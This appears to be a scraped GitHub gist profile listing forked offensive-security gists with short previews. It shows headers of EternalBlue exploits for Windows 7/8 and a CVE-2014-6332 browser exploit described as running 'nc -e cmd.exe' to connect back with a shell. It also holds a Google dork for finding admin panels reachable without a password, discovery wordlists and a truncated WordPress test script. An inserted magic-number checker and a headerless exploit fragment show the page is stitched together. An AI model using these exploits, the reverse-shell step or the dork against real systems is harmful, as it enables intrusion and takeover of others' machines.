Halim J. hxlxmj
@hxlxmj
hxlxmj / eternalblue8_exploit.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file is no longer updated. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
hxlxmj / eternalblue7_exploit.py
Created August 5, 2022 01:44 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file is no longer updated. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
hxlxmj / cve-2014-6332_exploit.html
Created August 5, 2022 01:44 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit: bypasses IE Protected Mode if it is enabled (via localhost), then gets a shell
The exploit drops nc.exe, then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the JavaScript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
hxlxmj / file_magic_numbers.md
Created July 25, 2022 06:50 — forked from leommoore/file_magic_numbers.md
File Magic Numbers

File Magic Numbers

Magic numbers are the first bytes of a file, which identify the type of file. This makes programming easier because complicated file structures need not be searched in order to identify the file type. Note that they identify what a file claims to be, not what it contains: anyone can put these bytes at the start of an arbitrary file, so a check on the first bytes alone does not prove that the rest of the file is well-formed or safe.

For example, a JPEG file starts with:

ffd8 ffe0 0010 4a46 4946 0001 0101 0047    ......JFIF.....G

ffd8 shows that it's a JPEG file (the Start Of Image marker), and ffe0 identifies a JFIF-type APP0 structure. There is an ASCII encoding of "JFIF" which comes after a two-byte length code (0010), but that is not necessary in order to identify the file. The first 4 bytes do that uniquely.
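As an added example (not part of leommoore's gist), here is a small Python checker that identifies a file from its leading bytes, parses the JFIF APP0 segment described above, and compares the detected type with the type the file name claims. The signature table, the sample files and the helper names are constructed for this illustration.

```python
# Added example, not code from the original gist: identify a file type from its
# leading bytes ("magic number"), parse the JFIF APP0 segment described above,
# and compare the detected type with the type the file name claims.
# The signature table, sample data and helper names are constructed for this
# illustration.
import struct
from typing import Optional, Tuple

# (magic bytes, offset, type name). Most signatures sit at offset 0; a few
# formats such as TAR put theirs further in ("ustar" at byte 257).
SIGNATURES = [
    (b"\xff\xd8\xff", 0, "jpeg"),        # SOI marker followed by another marker
    (b"\x89PNG\r\n\x1a\n", 0, "png"),
    (b"GIF87a", 0, "gif"),
    (b"GIF89a", 0, "gif"),
    (b"%PDF-", 0, "pdf"),
    (b"PK\x03\x04", 0, "zip"),           # also docx/xlsx/jar/apk containers
    (b"\x7fELF", 0, "elf"),
    (b"MZ", 0, "pe"),                    # DOS stub of a Windows PE
    (b"ustar", 257, "tar"),
]

EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif",
               "pdf": "pdf", "zip": "zip", "tar": "tar", "exe": "pe"}


def identify(data: bytes) -> Optional[str]:
    """Return the type whose signature matches at its offset, or None."""
    for magic, offset, name in SIGNATURES:
        if data[offset:offset + len(magic)] == magic:
            return name
    return None


def parse_jfif_app0(data: bytes) -> Optional[dict]:
    """Decode the APP0 segment that follows the SOI marker in a JFIF file.

    Layout: ffd8 (SOI) ffe0 (APP0) <length:2> "JFIF\\0" <major:1> <minor:1>
    <density units:1> <x density:2> <y density:2> <thumb w:1> <thumb h:1>.
    The length field counts itself, so the payload is length - 2 bytes.
    """
    if data[0:2] != b"\xff\xd8" or data[2:4] != b"\xff\xe0":
        return None
    (length,) = struct.unpack(">H", data[4:6])
    payload = data[6:4 + length]
    if len(payload) != length - 2 or len(payload) < 12 or payload[:5] != b"JFIF\x00":
        return None
    major, minor, units, xdens, ydens = struct.unpack(">BBBHH", payload[5:12])
    return {"length": length, "identifier": "JFIF", "version": (major, minor),
            "density_units": units, "density": (xdens, ydens)}


def check_upload(filename: str, data: bytes) -> Tuple[Optional[str], Optional[str], bool]:
    """Compare the type claimed by the extension with the type the bytes show."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXT_TO_TYPE.get(ext)
    detected = identify(data)
    return claimed, detected, claimed is not None and claimed == detected


# Constructed samples. JPEG_SAMPLE is the 16-byte header quoted in the text
# (SOI, APP0, length 0x0010, "JFIF", v1.1, 71x71 dpi) completed with the
# zero thumbnail size and an EOI marker so that the APP0 segment is whole.
JPEG_SAMPLE = bytes.fromhex("ffd8ffe000104a46494600010101004700470000ffd9")
PE_SAMPLE = b"MZ\x90\x00" + b"\x00" * 60                   # PE bytes under a .pdf name
GIF_POLYGLOT = b"GIF89a" + b"<script>alert(1)</script>"    # magic satisfied, body is HTML


if __name__ == "__main__":
    print(parse_jfif_app0(JPEG_SAMPLE))
    for name, blob in [("photo.jpg", JPEG_SAMPLE), ("report.pdf", PE_SAMPLE),
                       ("avatar.gif", GIF_POLYGLOT)]:
        print(name, check_upload(name, blob))
```

The third sample is the caveat in code: the GIF signature check passes, yet everything after the six magic bytes is HTML. A magic-number check catches mislabelled files (a PE under a .pdf name) but not a file built to carry a valid signature; for anything that a browser may render, a full decode of the format and a fixed Content-Type on the way out are still needed.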

This gives an ongoing list of file-type magic numbers.

Image Files

Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally. We provide world-class technology services by constantly exploring and implementing innovative solutions that drive long-term value to our customers. We have been providing solutions to clients across the globe for more than 5 years and boast of our extensive experience on website designing and development projects.
hxlxmj / content_discovery_all.txt
Created July 22, 2022 01:04 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
`
~/
~
ים
___
__
_
hxlxmj / all.txt
Created July 22, 2022 01:02 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
.
..
........
@
*
*.*
*.*.*
🐎
This file has been truncated, but you can view the full file.
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0
hxlxmj / params.txt
Created July 22, 2022 00:59 — forked from nullenc0de/params.txt
List of parameters for content discovery
0
1
11
12
13
14
15
16
17
2
# Use this script to test whether the vulnerability is present
# use it only to test your own systems
# use it responsibly
#
# usage:
# test-WP-CVE-2017-8295.sh [YOUR-SITE-TO-TEST] [USER-TO-TEST]
# ex: test-WP-CVE-2017-8295.sh example.com user
curl --write-out %{http_code} --silent --output ~/body.txt \